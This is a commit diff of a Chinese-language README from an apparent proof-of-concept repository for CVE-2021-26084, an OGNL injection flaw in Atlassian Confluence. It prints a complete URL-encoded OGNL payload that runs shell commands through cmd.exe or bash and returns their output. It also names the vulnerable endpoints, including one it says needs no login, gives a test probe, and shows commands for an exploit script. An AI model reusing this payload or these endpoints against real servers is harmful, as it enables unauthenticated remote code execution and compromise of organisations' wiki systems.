STRLCPY/CVE-2021-26084

Update README.md
青空之泪 committed with GitHub 3 years ago

407d4005

1 parent d8188698

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

Total 1 files

■ ■ ■ ■ ■ ■

README.md

		skipped 2 lines
3	3
4	4		Atlassian Confluence 是企业广泛使用的维基系统，其部分版本中存在OGNL 表达式注入漏洞。攻击者可以通过漏洞，不需要任何用户的情况下在目标Confluence 中执行任意代码。
5	5
6		-	安装过程：
7		-
8		-	![image](https://user-images.githubusercontent.com/91398948/138819468-67da589d-d6f4-43d6-93ef-64d9bb017b7e.png)
9		-
10		-	数据库的账号密码postgres
11		-
12		-	![image](https://user-images.githubusercontent.com/91398948/138819578-3b9866ce-c0d8-4b4b-9a0b-239e4a29189c.png)
13		-
14		-	设置邮箱账号密码
15		-
16		-	![image](https://user-images.githubusercontent.com/91398948/138819813-4f0abac1-fcfd-477c-8957-3ce8fead1276.png)
17		-
18		-	![image](https://user-images.githubusercontent.com/91398948/138819969-60410cd6-bb09-4542-a49e-dd09fffac997.png)
19		-
20		-	执行任意命令
	6	+	queryString参数执行任意命令
	7	+	------
21	8		```
22	9		queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022id%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027
23	10		```
24	11		/pages/createpage.action
25	12		这个接口需要一个可以创建页面的用户权限：
26	13
27		-	<code>
28		-	http://your-ip:8090/pages/createpage.action?spaceKey=KK&fromPageId=65618&src=quick-create&queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027
29		-	</code>
	14	+	/pages/createpage.action?spaceKey=KK&fromPageId=65618&src=quick-create&queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027
30	15
31	16		![image](https://user-images.githubusercontent.com/91398948/138823352-08ff1fc2-adea-4e64-bdfa-df5cde0ca3de.png)
32	17
		skipped 4 lines
37	22		![image](https://user-images.githubusercontent.com/91398948/138823589-ef4bcae0-61ca-4825-9c9b-79db3063044e.png)
38	23
39	24		/pages/createpage-entervariables.action
40		-	这个路径无需用户登录：
41	25
42		-	![image](https://user-images.githubusercontent.com/91398948/138824141-1d199514-2c60-4b67-aea1-c176c486dd6c.png)
	26	+	/pages/doenterpagevariables.action
	27	+
	28	+	不需要登录，用POST请求
	29	+
	30	+	![image](https://user-images.githubusercontent.com/91398948/138827501-97703a55-43b3-49b5-b5b8-fd2c8233144a.png)
	31	+
	32	+	脚本测试：
	33	+	------
	34	+	命令:
	35	+	<code>
	36	+	python3 -r test.txt
	37	+	</code>
43	38
44		-	/pages/doenterpagevariables.action
45		-	这个也不需要登录(页面模板向导)
	39	+	脚本利用:
	40	+	------
	41	+	命令:
	42	+	<code>
	43	+	python3 -u http://example.com
	44	+	</code>
	45	+
	46	+
46	47
47		-	![image](https://user-images.githubusercontent.com/91398948/138824310-4d31837d-c269-42f9-a954-3179bd75b120.png)
48	48
49	49		参考：
50	50
		skipped 8 lines

Update README.md